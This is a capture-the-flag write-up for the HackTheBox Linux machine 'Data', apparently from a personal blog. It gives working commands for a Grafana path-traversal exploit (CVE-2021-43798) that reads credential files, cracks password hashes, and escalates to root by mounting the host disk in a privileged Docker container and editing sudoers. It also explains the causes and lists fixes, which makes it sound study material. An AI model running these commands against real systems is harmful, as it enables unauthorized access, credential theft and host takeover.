data · foobarto.me

Summary

Data is an Easy Linux box on CVE-2021-43798 (Grafana plugin path traversal) → SQLite db read → PBKDF2 crack of boris → SSH → sudo docker exec --privileged lets boris mount /dev/sda1 into a container, write /etc/sudoers on the host.

The chain:

CVE-2021-43798: /public/plugins/alertlist/../../../../etc/passwd → unauth file read.
Read /var/lib/grafana/grafana.db (SQLite); extract PBKDF2 hashes; crack boris : beautiful1.
SSH as boris.
sudo -l: (root) NOPASSWD: /usr/bin/docker exec .... docker exec --privileged -u root <container> bash → privileged container; mount /dev/sda1 /mnt; edit /mnt/etc/sudoers to grant boris ALL.

Recon

22/tcp     OpenSSH
3000/tcp   Grafana 8.0.0 (footer)
TTL suggests Grafana in container; SSH on host

Foothold — CVE-2021-43798

curl -s "http://<TARGET>:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"
# returns /etc/passwd

curl -s "http://<TARGET>:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db" \
   -o grafana.db
sqlite3 grafana.db .dump | grep -i 'INSERT INTO "user"'
... boris : <pbkdf2-blob>
hashcat -m 10000 boris.hash rockyou.txt
# -> beautiful1
ssh boris@<TARGET>

Privesc — privileged docker exec

$ sudo -l
(root) NOPASSWD: /usr/bin/docker exec ...
$ docker ps   # find container ID
$ sudo /usr/bin/docker exec --privileged -u root -it <id> bash
# inside container with full host device access
mount /dev/sda1 /mnt
echo 'boris ALL=(ALL) NOPASSWD: ALL' >> /mnt/etc/sudoers
exit
sudo -i   # root on host

Why each step worked

CVE-2021-43798: Grafana 8.0.0 plugin path resolver didn’t canonicalise; .. segments allowed.
PBKDF2 + weak password: KDF is fine; password isn’t.
sudo docker exec: equivalent to root because Docker is designed to elevate. --privileged removes container isolation entirely, so host filesystem is reachable.

Counterfactuals

Patch Grafana ≥ 8.3.1.
Use a real KDF + strong passwords.
Don’t sudo docker; use rootless Docker or Podman if non-root container access is needed.

Source attribution

Reconstruction is grounded in:

0xdf, “HTB: Data” — https://0xdf.gitlab.io/2025/07/01/htb-data.html
IppSec, “Data” video walkthrough — https://ippsec.rocks/?#Data
Grafana CVE-2021-43798 advisory.